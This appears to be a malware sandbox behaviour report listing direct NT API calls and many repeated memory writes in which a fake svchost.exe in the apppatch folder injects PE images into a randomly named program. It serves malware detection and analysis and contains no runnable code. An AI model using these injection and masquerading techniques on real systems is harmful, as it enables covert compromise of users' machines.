Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2C6C

Injects a PE file into a foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1242000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: DD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: C52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1412000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 902000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1452000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2922000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 8E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29F2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2922000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2412000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27F2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 28C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2762000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3092000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2142000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2742000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2502000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3182000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2652000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: AA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2612000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2912000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C82000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2262000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2362000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BC2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A02000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F12000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 21B2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C82000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3032000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2592000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E02000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2982000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 902000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B62000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2252000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2652000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B12000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2592000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7B2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 6D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2332000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B82000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2892000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2932000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 742000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3062000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B62000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3032000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 20C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3242000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3242000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1240000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1241000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1242000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1294000	Jump to behavior
